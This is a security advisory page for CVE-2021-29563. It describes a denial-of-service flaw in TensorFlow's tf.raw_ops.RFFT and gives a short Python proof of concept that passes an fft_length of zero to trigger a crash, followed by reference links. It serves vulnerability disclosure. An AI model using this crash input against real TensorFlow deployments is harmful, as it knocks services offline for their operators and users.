CVE-2021-29563: CHECK-fail in `tf.raw_ops.RFFT`
(updated )
An attacker can cause a denial of service by exploiting a CHECK
-failure coming from the implementation of tf.raw_ops.RFFT
:
import tensorflow as tf
inputs = tf.constant([1], shape=[1], dtype=tf.float32)
fft_length = tf.constant([0], shape=[1], dtype=tf.int32)
tf.raw_ops.RFFT(input=inputs, fft_length=fft_length)
The above example causes Eigen code to operate on an empty matrix. This triggers on an assertion and causes program termination.
References
- github.com/advisories/GHSA-ph87-fvjr-v33w
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-491.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-689.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-200.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/31bd5026304677faa8a0b77602c6154171b9aec1
- github.com/tensorflow/tensorflow/security/advisories/GHSA-ph87-fvjr-v33w
- nvd.nist.gov/vuln/detail/CVE-2021-29563
Detect and mitigate CVE-2021-29563 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →